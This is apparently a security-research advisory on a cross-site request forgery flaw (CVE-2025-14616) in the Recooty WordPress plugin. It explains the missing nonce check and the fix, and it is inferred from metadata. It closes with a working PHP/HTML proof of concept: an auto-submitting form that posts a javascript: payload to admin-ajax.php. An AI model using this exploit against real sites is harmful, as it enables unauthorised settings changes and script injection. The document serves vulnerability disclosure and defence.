Atomic Edge analysis of CVE-2025-14616 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the Recooty – Job Widget (Old Dashboard) WordPress plugin versions up to and including 1.0.6. The vulnerability allows unauthenticated attackers to change the plugin’s ‘recooty_key’ option and inject malicious content into iframe src attributes by tricking an administrator into clicking a malicious link. The CVSS score of 4.3 (Medium) reflects the requirement for user interaction and the limited integrity impact.
Atomic Edge research identifies the root cause as missing nonce validation on the recooty_save_maybe() function. In WordPress, AJAX handlers and admin POST endpoints must verify a unique, user-specific nonce token to ensure requests originate from the intended user session. The plugin’s function lacks this verification. This conclusion is inferred from the CWE-352 classification and the description stating ‘missing nonce validation.’ Without access to source code, Atomic Edge cannot confirm the exact function signature or hook registration.
Exploitation requires an attacker to craft a forged HTTP request and trick a logged-in administrator into submitting it. The attack vector is likely a POST request to the WordPress admin AJAX handler (/wp-admin/admin-ajax.php) or the admin-post.php endpoint. The action parameter would be ‘recooty_save_maybe’ based on the function name. The payload would contain POST parameters to update the ‘recooty_key’ option with attacker-controlled data, which is then unsafely output within an iframe src attribute.
Remediation requires adding proper nonce verification to the recooty_save_maybe() function. The developer should use the WordPress wp_verify_nonce() function to check a valid nonce token submitted with the request. The function should also implement a capability check (e.g., current_user_can(‘manage_options’)) to ensure only authorized users can perform the action. These are standard WordPress security practices for privileged operations.
Successful exploitation allows an attacker to modify the ‘recooty_key’ option, which the description indicates is unsafely reflected into iframe src attributes. This could lead to stored Cross-Site Scripting (XSS) if the iframe src accepts javascript: URIs or data: URIs. An attacker could deface the site, redirect users, or perform actions within the administrator’s context. The impact is limited to integrity (unauthorized settings change) and potential client-side attacks, not direct server compromise.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14616 - Recooty <= 1.0.6 - Cross-Site Request Forgery to Settings Update
<?php
/**
* Proof of Concept for CVE-2025-14616.
* This script generates a malicious HTML page that, when visited by a logged-in WordPress administrator,
* forges a request to update the Recooty plugin's settings.
* ASSUMPTIONS (based on metadata):
* 1. The vulnerable endpoint is /wp-admin/admin-ajax.php.
* 2. The AJAX action is 'recooty_save_maybe' (derived from function name).
* 3. The parameter controlling the 'recooty_key' option is named 'recooty_key'.
* 4. The plugin does not validate a nonce or capability in this request.
*/
$target_url = 'http://vulnerable-wordpress-site.com'; // CHANGE THIS
// The malicious value to inject into the iframe src attribute.
// This example uses a javascript: payload to demonstrate XSS potential.
$malicious_key = 'javascript:alert(document.domain)';
?>
<!DOCTYPE html>
<html>
<head>
<title>Recooty CSRF PoC</title>
</head>
<body>
<h2>CVE-2025-14616 CSRF Proof of Concept</h2>
<p>If a WordPress administrator views this page while logged into the target site, the form below will automatically submit and change the Recooty plugin's settings.</p>
<form id="exploit" action="<?php echo htmlspecialchars($target_url); ?>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="recooty_save_maybe" />
<!-- Assumed parameter name based on option 'recooty_key' -->
<input type="hidden" name="recooty_key" value="<?php echo htmlspecialchars($malicious_key); ?>" />
<!-- Other potential parameters may be required; this is a minimal PoC based on available metadata -->
</form>
<script>
// Auto-submit the form to simulate a single click on a malicious link.
document.getElementById('exploit').submit();
</script>
</body>
</html>
